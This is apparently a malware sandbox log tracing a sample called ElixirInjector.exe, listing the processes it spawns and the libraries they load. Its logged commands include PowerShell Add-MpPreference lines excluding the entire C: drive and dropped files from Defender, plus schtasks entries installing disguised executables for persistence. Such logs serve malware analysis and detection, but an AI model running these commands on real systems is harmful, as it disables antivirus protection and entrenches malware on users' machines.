Source: unknown	Process created: C:\Users\user\Desktop\ElixirInjector.exe "C:\Users\user\Desktop\ElixirInjector.exe"
Source: C:\Users\user\Desktop\ElixirInjector.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\6iq5IFzZA9EyHTwKHM8vXk9USXtHecApoG.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe "C:\Users\user\AppData\Local\Temp\WinRAR/data/bin/unistall/Bluestacks.exe"
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fvXBwqYdGYPkplbuTcoXecCdPf" /sc MINUTE /mo 9 /tr "'C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fvXBwqYdGYPkplbuTcoXecCdPf" /sc MINUTE /mo 7 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
Source: unknown	Process created: C:\Windows\ShellComponents\cmd.exe C:\Windows\ShellComponents\cmd.exe
Source: unknown	Process created: C:\Windows\ShellComponents\cmd.exe C:\Windows\ShellComponents\cmd.exe
Source: unknown	Process created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellComponents\cmd.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9w1FkSj5b9.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe
Source: unknown	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe "C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe"
Source: C:\Users\user\Desktop\ElixirInjector.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\6iq5IFzZA9EyHTwKHM8vXk9USXtHecApoG.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe "C:\Users\user\AppData\Local\Temp\WinRAR/data/bin/unistall/Bluestacks.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe'" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fvXBwqYdGYPkplbuTcoXecCdPf" /sc MINUTE /mo 9 /tr "'C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe'" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fvXBwqYdGYPkplbuTcoXecCdPf" /sc MINUTE /mo 7 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe'" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9w1FkSj5b9.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe "C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe"

Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ElixirInjector.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: ktmw32.dll	Jump to behavior
